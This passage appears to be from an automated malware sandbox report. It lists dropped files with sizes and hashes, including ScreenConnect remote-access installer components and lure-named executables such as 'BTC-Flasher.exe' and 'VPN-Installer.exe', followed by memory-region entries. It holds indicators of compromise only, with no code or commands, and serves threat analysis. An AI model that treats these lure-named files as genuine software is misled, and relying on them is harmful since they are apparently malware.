                                                            83334f752a13d0bd447e0784712448b0669f3eb2ef39fe65fda0c4f404783a01fa3b891ce77ea13d857c3dd048d5767f756eb1a91bd1c7e7403b81e713b5e8ad

                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                            Filesize

                                                            2B

                                                            MD5

                                                            d751713988987e9331980363e24189ce

                                                            SHA1

                                                            97d170e1550eee4afc0af065b78cda302a97674c

                                                            SHA256

                                                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                            SHA512

                                                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

                                                            Filesize

                                                            746B

                                                            MD5

                                                            26c503e0811477d4790fa3b9260e6bc3

                                                            SHA1

                                                            cd89a648ea30052b34d2ce993433967adfdf5b74

                                                            SHA256

                                                            76ced2c52d647683572ceac0687933e96e198b5a6f998457fa334763cc1ef978

                                                            SHA512

                                                            125678cee78705f07e56d69ffbf08fd616dac3ea3f2ff34f4e703b0ec2329da575e5b30de4494639baa17d8e68343ceb9a4e99e9edcaf4cfad516a715a904874

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                            Filesize

                                                            152B

                                                            MD5

                                                            d24eb2a9140d14bea6ab2e3618d4ad51

                                                            SHA1

                                                            9839c06696255719a27823f0456e190a61b0d836

                                                            SHA256

                                                            76f12449d962e2a9edb79b87dc952b63996e175c56876e82d8b278f1ca4a967b

                                                            SHA512

                                                            eb9b1ccb8ec4555575b1bb30067f7e7ebac792853595d201d1277722f139828fb780cbdf2a6230411c59d5782b01990c359ff62f24a8857387f292c30cc802f5

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                            Filesize

                                                            152B

                                                            MD5

                                                            c0521de85014ffb439beaef46a04d57a

                                                            SHA1

                                                            e4030babf5f4ebebce667e1bdfa5930a01ac96bb

                                                            SHA256

                                                            5ff0c55032b921b8de62351bac8575b4db7e03594e0e478055f2f5db8a8651e2

                                                            SHA512

                                                            fab681972a0667cb0edb14dec55154e42d242cb92e4f84ceebbd970cae1777e3c57ab55b1913b0e652f87f02aeffe9f14c918727b31588e49860840c95f0e9ea

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                            Filesize

                                                            5KB

                                                            MD5

                                                            bacea279f54fcc511936d06297e3832b

                                                            SHA1

                                                            a64d80fe6e611b601cd718866d82d06303ed8476

                                                            SHA256

                                                            fd003845711559e5b86c5df5dd90f1add3a53fe6b386c5e5bdbfbd6465a04755

                                                            SHA512

                                                            a3342af65ecbd5e500e15d05c7ad368e9ea9077cf8221f1637a2835adae8f27c9eba382649c50985c0043c902789d056ad4ff72ea76c4d3d4d4e745e8ddbca63

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

                                                            Filesize

                                                            264KB

                                                            MD5

                                                            f50f89a0a91564d0b8a211f8921aa7de

                                                            SHA1

                                                            112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                            SHA256

                                                            b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                            SHA512

                                                            bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                          • C:\Users\Admin\AppData\Local\Temp\MSI85D9.tmp

                                                            Filesize

                                                            1.0MB

                                                            MD5

                                                            8a8767f589ea2f2c7496b63d8ccc2552

                                                            SHA1

                                                            cc5de8dd18e7117d8f2520a51edb1d165cae64b0

                                                            SHA256

                                                            0918d8ab2237368a5cec8ce99261fb07a1a1beeda20464c0f91af0fe3349636b

                                                            SHA512

                                                            518231213ca955acdf37b4501fde9c5b15806d4fc166950eb8706e8d3943947cf85324faee806d7df828485597eceffcfa05ca1a5d8ab1bd51ed12df963a1fe4

                                                          • C:\Users\Admin\AppData\Local\Temp\MSI85D9.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                            Filesize

                                                            172KB

                                                            MD5

                                                            5ef88919012e4a3d8a1e2955dc8c8d81

                                                            SHA1

                                                            c0cfb830b8f1d990e3836e0bcc786e7972c9ed62

                                                            SHA256

                                                            3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d

                                                            SHA512

                                                            4544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684

                                                          • C:\Users\Admin\AppData\Local\Temp\MSI85D9.tmp-\ScreenConnect.Core.dll

                                                            Filesize

                                                            536KB

                                                            MD5

                                                            14e7489ffebbb5a2ea500f796d881ad9

                                                            SHA1

                                                            0323ee0e1faa4aa0e33fb6c6147290aa71637ebd

                                                            SHA256

                                                            a2e9752de49d18e885cbd61b29905983d44b4bc0379a244bfabdaa3188c01f0a

                                                            SHA512

                                                            2110113240b7d803d8271139e0a2439dbc86ae8719ecd8b132bbda2520f22dc3f169598c8e966ac9c0a40e617219cb8fe8aac674904f6a1ae92d4ac1e20627cd

                                                          • C:\Users\Admin\AppData\Local\Temp\MSI85D9.tmp-\ScreenConnect.InstallerActions.dll

                                                            Filesize

                                                            11KB

                                                            MD5

                                                            73a24164d8408254b77f3a2c57a22ab4

                                                            SHA1

                                                            ea0215721f66a93d67019d11c4e588a547cc2ad6

                                                            SHA256

                                                            d727a640723d192aa3ece213a173381682041cb28d8bd71781524dbae3ddbf62

                                                            SHA512

                                                            650d4320d9246aaecd596ac8b540bf7612ec7a8f60ecaa6e9c27b547b751386222ab926d0c915698d0bb20556475da507895981c072852804f0b42fdda02b844

                                                          • C:\Users\Admin\AppData\Local\Temp\MSI85D9.tmp-\ScreenConnect.Windows.dll

                                                            Filesize

                                                            1.6MB

                                                            MD5

                                                            9ad3964ba3ad24c42c567e47f88c82b2

                                                            SHA1

                                                            6b4b581fc4e3ecb91b24ec601daa0594106bcc5d

                                                            SHA256

                                                            84a09ed81afc5ff9a17f81763c044c82a2d9e26f852de528112153ee9ab041d0

                                                            SHA512

                                                            ce557a89c0fe6de59046116c1e262a36bbc3d561a91e44dcda022bef72cb75742c8b01bedcc5b9b999e07d8de1f94c665dd85d277e981b27b6bfebeaf9e58097

                                                          • C:\Users\Admin\AppData\Local\Temp\MSICF57.tmp-\Microsoft.Deployment.Compression.Cab.dll

                                                            Filesize

                                                            48KB

                                                            MD5

                                                            77be59b3ddef06f08caa53f0911608a5

                                                            SHA1

                                                            a3b20667c714e88cc11e845975cd6a3d6410e700

                                                            SHA256

                                                            9d32032109ffc217b7dc49390bd01a067a49883843459356ebfb4d29ba696bf8

                                                            SHA512

                                                            c718c1afa95146b89fc5674574f41d994537af21a388335a38606aec24d6a222cbce3e6d971dfe04d86398e607815df63a54da2bb96ccf80b4f52072347e1ce6

                                                          • C:\Users\Admin\AppData\Local\Temp\MSICF57.tmp-\Microsoft.Deployment.Compression.dll

                                                            Filesize

                                                            36KB

                                                            MD5

                                                            4717bcc62eb45d12ffbed3a35ba20e25

                                                            SHA1

                                                            da6324a2965c93b70fc9783a44f869a934a9caf7

                                                            SHA256

                                                            e04de7988a2a39931831977fa22d2a4c39cf3f70211b77b618cae9243170f1a7

                                                            SHA512

                                                            bb0abc59104435171e27830e094eae6781d2826ed2fc9009c8779d2ca9399e38edb1ec6a10c1676a5af0f7cacfb3f39ac2b45e61be2c6a8fe0edb1af63a739ca

                                                          • C:\Users\Admin\AppData\Local\Temp\MSICF57.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll

                                                            Filesize

                                                            56KB

                                                            MD5

                                                            a921a2b83b98f02d003d9139fa6ba3d8

                                                            SHA1

                                                            33d67e11ad96f148fd1bfd4497b4a764d6365867

                                                            SHA256

                                                            548c551f6ebc5d829158a1e9ad1948d301d7c921906c3d8d6b6d69925fc624a1

                                                            SHA512

                                                            e1d7556daf571c009fe52d6ffe3d6b79923daeea39d754ddf6beafa85d7a61f3db42dfc24d4667e35c4593f4ed6266f4099b393efa426fa29a72108a0eaedd3e

                                                          • C:\Users\Admin\AppData\Local\Temp\MSIE713.tmp-\CustomAction.config

                                                            Filesize

                                                            234B

                                                            MD5

                                                            6f52ebea639fd7cefca18d9e5272463e

                                                            SHA1

                                                            b5e8387c2eb20dd37df8f4a3b9b0e875fa5415e3

                                                            SHA256

                                                            7027b69ab6ebc9f3f7d2f6c800793fde2a057b76010d8cfd831cf440371b2b23

                                                            SHA512

                                                            b5960066430ed40383d39365eadb3688cadadfeca382404924024c908e32c670afabd37ab41ff9e6ac97491a5eb8b55367d7199002bf8569cf545434ab2f271a

                                                          • C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi

                                                            Filesize

                                                            9.5MB

                                                            MD5

                                                            0952d023989ab1335bb102c3ccbe6560

                                                            SHA1

                                                            d85d01996ccdee66ef2e2ecde7396010302084cf

                                                            SHA256

                                                            c9a2223eece64c9a9bda6698ee41fd7884905cd4aebfd4e43d33bb6da15eb8b7

                                                            SHA512

                                                            65599bb24480b22ad6dea24c841e248d2511dc49aaf90f1a3af61247504c491dbac55552e02b8fcfc7258f6aae5794130c72da5238a33886dbf78c056a7e5f9d

                                                          • C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi

                                                            Filesize

                                                            9.5MB

                                                            MD5

                                                            8cd86deb5832bbe7d1f1694344ed3630

                                                            SHA1

                                                            e268e4254203346e1a55b5ca65b6d7e19ec2c525

                                                            SHA256

                                                            7814365ddd6d22a373e4279d42816bcf8b53bf146c2e5ba4a334003da9a47a82

                                                            SHA512

                                                            7794b5203b94d4688c75cd7bdaec345d50e39e48712bef37d85124dd280e0659e9bf22dd063f24aec0d248c5de96a8647127ecfd1de4c5436dbade57c5d36cb1

                                                          • C:\Users\Admin\AppData\Local\Temp\a\02.08.2022.exe

                                                            Filesize

                                                            242KB

                                                            MD5

                                                            97688d1dfb46caa2d259c14066a6b0b1

                                                            SHA1

                                                            3305e32ca0004e82f9199bdf02115e38be592c23

                                                            SHA256

                                                            5cd644eccdd1f056b6cf779f7f84cfa66c34f2f58b85f44799db87ef9852526a

                                                            SHA512

                                                            6421d8eb6ce0c8254d3c179343d49631926f45361f457da2600873d2815904b71def7e8288b1138b0c809d582116a9894dddad99cd29e9f789ecb8ae5cdc2bff

                                                          • C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe

                                                            Filesize

                                                            5.4MB

                                                          • C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe

                                                            Filesize

                                                            5.4MB

                                                          • C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe

                                                            Filesize

                                                            5.4MB

                                                          • C:\Users\Admin\AppData\Local\Temp\a\main.exe

                                                            Filesize

                                                            3.2MB

                                                          • C:\Users\Admin\AppData\Local\Temp\a\pothjasefdj.exe

                                                            Filesize

                                                            120KB

                                                          • C:\Windows\Installer\MSIBD74.tmp

                                                            Filesize

                                                            202KB

                                                          • C:\Windows\Installer\{3E38E495-441B-B71E-19A8-658C81C8B012}\DefaultIcon

                                                            Filesize

                                                            435B

                                                          • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

                                                            Filesize

                                                            24.6MB

                                                          • \??\Volume{76fc64c0-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{f19b961d-e44e-4914-8582-3227df8cd61b}_OnDiskSnapshotProp

                                                            Filesize

                                                            6KB

                                                          • memory/252-67-0x0000000004B70000-0x0000000004B9E000-memory.dmp

                                                            Filesize

                                                            184KB

                                                          • memory/252-71-0x0000000004BB0000-0x0000000004BBA000-memory.dmp

                                                            Filesize

                                                            40KB

                                                          • memory/252-75-0x0000000004C60000-0x0000000004CEC000-memory.dmp

                                                            Filesize

                                                            560KB

                                                          • memory/252-79-0x0000000004EA0000-0x000000000504A000-memory.dmp

                                                            Filesize

                                                            1.7MB

                                                          • memory/468-163-0x0000000000780000-0x0000000000816000-memory.dmp

                                                            Filesize

                                                            600KB

                                                          • memory/468-179-0x000000001BCE0000-0x000000001BE68000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/468-167-0x000000001B760000-0x000000001B7EC000-memory.dmp

                                                            Filesize

                                                            560KB

                                                          • memory/468-180-0x00000000027F0000-0x0000000002808000-memory.dmp

                                                            Filesize

                                                            96KB

                                                          • memory/468-181-0x0000000002880000-0x0000000002898000-memory.dmp

                                                            Filesize

                                                            96KB

                                                          • memory/468-168-0x000000001B9A0000-0x000000001BB4A000-memory.dmp

                                                            Filesize

                                                            1.7MB

                                                          • memory/468-164-0x0000000002810000-0x0000000002846000-memory.dmp

                                                            Filesize

                                                            216KB

                                                          • memory/568-292-0x000000001B740000-0x000000001B812000-memory.dmp

                                                            Filesize

                                                            840KB

                                                          • memory/1028-323-0x0000000000B00000-0x0000000000B22000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/1208-41-0x0000000005EF0000-0x00000000061E0000-memory.dmp

                                                            Filesize

                                                            2.9MB

                                                          • memory/1208-42-0x0000000005BF0000-0x0000000005C7C000-memory.dmp

                                                            Filesize

                                                            560KB

                                                          • memory/1208-43-0x0000000005B90000-0x0000000005BB2000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/1208-40-0x0000000001B90000-0x0000000001B98000-memory.dmp

                                                            Filesize

                                                            32KB

                                                          • memory/1208-44-0x0000000005C80000-0x0000000005E2A000-memory.dmp

                                                            Filesize

                                                            1.7MB

                                                          • memory/1208-45-0x0000000006790000-0x0000000006D36000-memory.dmp

                                                            Filesize

                                                            5.6MB

                                                          • memory/2356-657-0x0000000000400000-0x0000000000422000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/2356-926-0x0000000000400000-0x0000000000422000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/3116-134-0x0000000002080000-0x0000000002098000-memory.dmp

                                                            Filesize

                                                            96KB

                                                          • memory/3116-145-0x0000000004810000-0x0000000004860000-memory.dmp

                                                            Filesize

                                                            320KB

                                                          • memory/3116-154-0x0000000004CE0000-0x0000000004DB2000-memory.dmp

                                                            Filesize

                                                            840KB

                                                          • memory/3116-152-0x0000000004A50000-0x0000000004A91000-memory.dmp

                                                            Filesize

                                                            260KB

                                                          • memory/3116-150-0x0000000004AF0000-0x0000000004B82000-memory.dmp

                                                            Filesize

                                                            584KB

                                                          • memory/3116-149-0x0000000004A10000-0x0000000004A46000-memory.dmp

                                                            Filesize

                                                            216KB

                                                          • memory/3268-946-0x0000000000210000-0x00000000006A3000-memory.dmp

                                                            Filesize

                                                            4.6MB

                                                          • memory/3268-944-0x0000000000210000-0x00000000006A3000-memory.dmp

                                                            Filesize

                                                            4.6MB

                                                          • memory/4768-640-0x000001E1D0D60000-0x000001E1D0D6A000-memory.dmp

                                                            Filesize

                                                            40KB

                                                          • memory/4768-641-0x000001E1D0D90000-0x000001E1D0D98000-memory.dmp

                                                            Filesize

                                                            32KB

                                                          • memory/4768-639-0x000001E1D0810000-0x000001E1D083C000-memory.dmp

                                                            Filesize

                                                            176KB

                                                          • memory/4768-643-0x000001E1EC400000-0x000001E1EC4A8000-memory.dmp

                                                            Filesize

                                                            672KB

                                                          • memory/4768-644-0x000001E1EAE90000-0x000001E1EAEB2000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/4768-645-0x000001E1EAE60000-0x000001E1EAE74000-memory.dmp

                                                            Filesize

                                                            80KB

                                                          • memory/4788-23-0x000001D3232F0000-0x000001D3232F1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/4788-26-0x000001D3232F0000-0x000001D3232F1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/4788-28-0x000001D3232F0000-0x000001D3232F1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/4788-17-0x000001D3232F0000-0x000001D3232F1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/4788-18-0x000001D3232F0000-0x000001D3232F1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/4788-16-0x000001D3232F0000-0x000001D3232F1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/4788-22-0x000001D3232F0000-0x000001D3232F1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/4788-27-0x000001D3232F0000-0x000001D3232F1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/4788-24-0x000001D3232F0000-0x000001D3232F1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/4788-25-0x000001D3232F0000-0x000001D3232F1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/4900-2-0x00007FFE85CB0000-0x00007FFE86772000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/4900-3-0x00007FFE85CB3000-0x00007FFE85CB5000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/4900-0-0x00007FFE85CB3000-0x00007FFE85CB5000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/4900-13-0x00007FFE85CB0000-0x00007FFE86772000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/4900-1-0x0000000000660000-0x0000000000668000-memory.dmp

                                                            Filesize

                                                            32KB